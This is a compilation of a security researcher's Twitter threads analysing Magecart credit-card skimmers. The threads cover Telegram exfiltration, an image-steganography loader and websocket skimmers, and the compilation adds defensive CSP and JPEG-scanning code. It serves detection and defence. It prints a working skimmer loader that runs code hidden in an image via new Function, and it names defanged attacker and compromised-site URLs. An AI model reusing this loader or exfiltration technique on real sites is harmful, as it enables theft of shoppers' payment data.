Eric Brandel
Aug 28, 2020, 12 tweets
Thanks to data from @sansecio I think we've found the first digital skimmer/#magecart script to exfil using Telegram. In this thread, I'll go through the code, the drawbacks of this approach, and how to stop it dead (hint: CSP).

1/11
This of course isn't the first digital skimmer to abuse unrelated services to exfil its data. For example, back in June we saw the public disclosure of digital skimmers abusing Google Analytics: sansec.io/research/skimm…

2/x
A prettified version of the script is here: gist.github.com/krautface/c07a…

It's mostly unaltered, but I did redact one bit of information which I'll mention later.

3/x
Lines 1-63 are pretty standard anti-RE checks. Looks to see if Firebug is open and looks to see if it can detect if the browser's devtools are open. This check is, as always, ineffective if you pop your devtools out.

4/x
On line 69 there is a loadScript function which will take a URL and a function to call after the script is loaded. On line 80 we see the loadScript function used to bring in JSEncrypt.

5/x
The public key for JSEncrypt is on line 120, followed by the jsencryptstart function.

6/x
On Line 227 is the getData function. It looks for every type of input field it can find, and then goes through them all, comparing them to a list of possible field names that were specified on Line 113.

7/x
The payer() function on Line 288 is where the data exfil occurs. It first grabs the data by calling getData and then verifies it has address details, trying to find them in another place if it hasn't yet retrieved them.

8/x
It then encrypts the data with the public key and runs some base64 encoded code, which is the actual exfil code, and the interesting part in all of this. To post to Telegram using a bot all you need is the bot token and a chat to post into.

9/x
The tbot variable contains the bot token, and it's currently redacted in the code I shared above. The reason being? Anyone could control the bot using that token, and most likely gobble up the cards being exfiltrated.

10/11
And that's the big drawback here: Telegram isn't set up to do this type of thing properly, you have to grant publicly accessible code too much power. And, like many other digital skimming/#magecart techniques, this can be preemptively defeated via a Content Security Policy.

11/11
"and most likely gobble up the cards being exfiltrated" -

Now that I think about it, that isn't possible in this case with the public key encryption being employed.

12/11
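Added example, not code from the thread or from the skimmer: a small Node.js checker for the question the thread closes on, whether a given Content Security Policy would let a page script reach the Telegram Bot API sendMessage endpoint. It evaluates connect-src (for fetch/XHR) with the default-src fallback, and also img-src and script-src, since an image beacon or a loaded script such as JSEncrypt is governed by those directives instead. The shop origin, the two policies and the bot token are constructed placeholders; the token is not the one redacted in the gist.

```javascript
// Added example, not the thread's or the skimmer's code. Constructed assumptions:
// the shop page's origin and a placeholder bot token standing in for the redacted one.
const PAGE_ORIGIN = "https://shop.example";
const EXFIL_URL = "https://api.telegram.org/bot123456:PLACEHOLDER_TOKEN/sendMessage";
// Parse "directive value ...; directive ..." into a Map; first occurrence wins.
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(";")) {
    const [name, ...values] = part.trim().split(/\s+/).filter(Boolean);
    if (name && !directives.has(name.toLowerCase())) {
      directives.set(name.toLowerCase(), values);
    }
  }
  return directives;
}

// Match one source expression ('none', 'self', *, scheme:, [scheme://]host[:port])
// against a parsed URL. Paths are not compared; nonces and hashes never match.
function sourceMatches(expr, target) {
  const e = expr.toLowerCase();
  if (e === "'none'") return false;
  if (e === "'self'") return target.origin === PAGE_ORIGIN;
  if (e === "*") return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(e)) return target.protocol === e;
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^\/:]+)(?::(\d+|\*))?(?:\/.*)?$/.exec(e);
  if (!m) return false;
  const [, scheme, host, port] = m;
  if (scheme && `${scheme}:` !== target.protocol) return false;
  const hostOk = host.startsWith("*.")
    ? target.hostname.endsWith(host.slice(1)) // "*.telegram.org" matches api.telegram.org
    : host === target.hostname;
  const targetPort = target.port || { "https:": "443", "http:": "80" }[target.protocol] || "";
  return hostOk && (!port || port === "*" || port === targetPort);
}

// Is a request governed by `directive` (connect-src for fetch/XHR, img-src for an
// image beacon, script-src for a loaded script such as JSEncrypt) allowed? Falls
// back to default-src; with no applicable directive the request is allowed.
function requestAllowed(policy, directive, url) {
  const d = parseCsp(policy);
  const values = d.get(directive) ?? d.get("default-src");
  if (values === undefined) return true;
  const target = new URL(url);
  return values.some((v) => sourceMatches(v, target));
}

// Constructed policies: one whose connect-src lets the exfil through, one that
// pins connections to the page itself plus a named payment host.
const WEAK_POLICY = "default-src 'self'; script-src 'self' https:; connect-src *";
const HARDENED_POLICY = "default-src 'self'; script-src 'self'; connect-src 'self' https://api.payments.example";
```

Run it against your own policy header and the directive matching the exfil mechanism you see in the decoded code; a permissive `connect-src *` or a missing default-src is what lets this class of skimmer phone home.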

More from @AffableKraut

Feb 23, 2021
Been looking at a digital skimmer/#magecart script I call "ManyQ" and figured I'd share what I've found.

Highlights: 200+ victims, in use since at least Feb 2020, and, most interesting, might be by Sochi, the creator of Inter.

1/30
Going to cover a fair amount of ground here:

- How it works
- Share some various copies of it
- Infrastructure it's been deployed on and related Infrastructure
- Connections to Inter

And, yeah, "ManyQ" isn't the greatest name, but naming things is hard.

2/30
Ok, first, here's some source code:

ManyQ Obfuscated: gist.github.com/krautface/ea24…

ManyQ Fully Deobfuscated: gist.github.com/krautface/5c13…

This skimmer was the one exfiltrating via Google Apps Script, but that's not directly a function of it:


3/30
Feb 6, 2020
Saw this new digital skimmer/#magecart JS for the first time last week. Haven't had time to dig really deep into it, but here's the basic overview. Calling it the Callback skimmer for now. Above average JS for a digital skimmer.

1/9
As I said, this is going to be a quick overview. Here's the loader:
gist.github.com/krautface/5a29…

2/9
That calls out to hxxps://jquery-cycle[.]com/analytics.js?q=0.44886615665744056 which returns the following code: gist.github.com/krautface/91c6…

It is encoded, but the Callback loader decodes it and runs it. If I recall correctly, that code just makes the same call again.

3/9
Dec 26, 2019
New digital skimmer/#magecart technique: steganography

A colleague found this a couple of days ago while searching through our SIEM. The skimmer group uploads or modifies an existing image and appends the JS code.

1/5
Here's an example of a live image. You can load this image and prepend view-source: The next tweet has the code that loads and runs the code in this image. The full skimmer code is in a gist on the last tweet.

hxxps://www.truthinaging[.]com/media/wysiwyg/FreeShipping.jpg

2/5
var xhr = new XMLHttpRequest();
xhr.open('GET', '<image>', true); // the image URL from the previous tweet
xhr.send();
xhr.onreadystatechange = function() {
    if (this.readyState != 4) return;   // wait until the response is complete
    if (this.status == 200) {
        // The skimmer JS is appended to the image: the last 19704 characters
        // of the response body are the code, compiled and run as a function
        var F = new Function(this.responseText.slice(-19704));
        return F();
    }
};

3/5
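Added example, not code from the thread: a Node.js check a site owner can run over a media directory to flag JPEGs that carry data after the End Of Image marker, which is where the loader above expects the appended skimmer code. The JPEG bytes and the appended snippet are constructed stand-ins; the image URL in the thread is not fetched.

```javascript
// Added example, not the thread's code. Sample inputs below are constructed.
// Smallest JPEG skeleton needed here: SOI, a short APP0 segment, EOI.
const JPEG_STUB = Buffer.from([0xff, 0xd8, 0xff, 0xe0, 0x00, 0x04, 0x4a, 0x46, 0xff, 0xd9]);
// Constructed, harmless stand-in for appended code; only its shape matters.
const APPENDED_JS = "(function(){var f=document.forms;/* constructed stand-in */})();";
const CLEAN_SAMPLE = JPEG_STUB;
const SKIMMED_SAMPLE = Buffer.concat([JPEG_STUB, Buffer.from(APPENDED_JS, "latin1")]);

// Inspect what follows the last FF D9. Appended JS is ASCII and can never contain
// 0xFF, so for this case the last EOI in the file is the image's real end (an
// EXIF thumbnail has its own nested SOI/EOI and is skipped correctly).
// Returns { trailingBytes, looksLikeJs, snippet }; a legitimate binary trailer
// shows up as trailing bytes that do not look like JS.
function inspectJpegTail(buf) {
  if (buf.length < 4 || buf[0] !== 0xff || buf[1] !== 0xd8) {
    throw new Error("not a JPEG: missing FF D8 SOI marker");
  }
  const eoi = buf.lastIndexOf(Buffer.from([0xff, 0xd9]));
  if (eoi < 0) throw new Error("no FF D9 EOI marker found");
  const tail = buf.subarray(eoi + 2);
  const text = tail.toString("latin1");
  const printable = text.length === 0
    ? 0
    : (text.match(/[\x20-\x7e\t\r\n]/g) || []).length / text.length;
  const looksLikeJs = printable > 0.95 &&
    /\b(function|var|let|const|new Function|XMLHttpRequest|eval)\b|=>/.test(text);
  return { trailingBytes: tail.length, looksLikeJs, snippet: text.slice(0, 60) };
}

// Scan [name, buffer] pairs (e.g. read from a media directory) and return the
// names whose tail looks like appended script, for manual review.
function suspiciousImages(files) {
  return files
    .filter(([, buf]) => inspectJpegTail(buf).looksLikeJs)
    .map(([name]) => name);
}
```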
Dec 17, 2019
I think I stumbled upon a novel digital skimmer/#magecart script still in development and figured I'd share all the code and (limited) infrastructure I've found so far. And I'll share the simple method to stop this technique dead (tweet 16 😉)

First, what makes it unique?

1/17
- Malicious payload is loaded over websockets
- Exfil over websockets
- A rather clever skimmer loader that I think may fool a lot of people
- CSS classes(!) being used to construct the URL

Intrigued? Great. Let's go

2/x
Let's look at the skimmer loader. Look like anything you're used to seeing? querySelector, className, Canvas ondraw? What in the world? Where's the script tag created?

3/x
Aug 27, 2019
Let’s do a quick dive into quickly pulling out the interesting bits from an obfuscated #magecart script. And by that I mostly mean the exfil URL. This will only cover one of the most common obfuscator types, as featured at javascriptobfuscator.com and obfuscator.io.
There’s lots of other types as well, but this is a good place to start. First, the simplest type, one with hex encoded strings. You can play with that one here: gist.github.com/krautface/aed4…
This is really easy to deobfuscate completely, using beautifier.io, but if you just want to know what’s in that array of strings, just copy the [ … ] into your devtools and hit enter and presto, your work is done.
Aug 2, 2019
Want to learn to hunt for some #magecart infrastructure? Then you've come to the right place. Going to walk you through how to do it, from the very start to the end. /thread (probably 30-35 tweets, so hope you're interested)
Just found a couple of domains that I haven't seen elsewhere, so if you stick through to the end you'll get to see newly discovered infrastructure. If you somehow knew of it already, let's talk, I'd be curious how you came upon them.
2/x
First, a disclaimer/ask: when you're doing this, you're going to find affected websites. There's lots and lots of them. Maybe don't name and shame the little guys? Takes about the same amount of time to send them a quick note as it does to highlight that they're affected.
3/x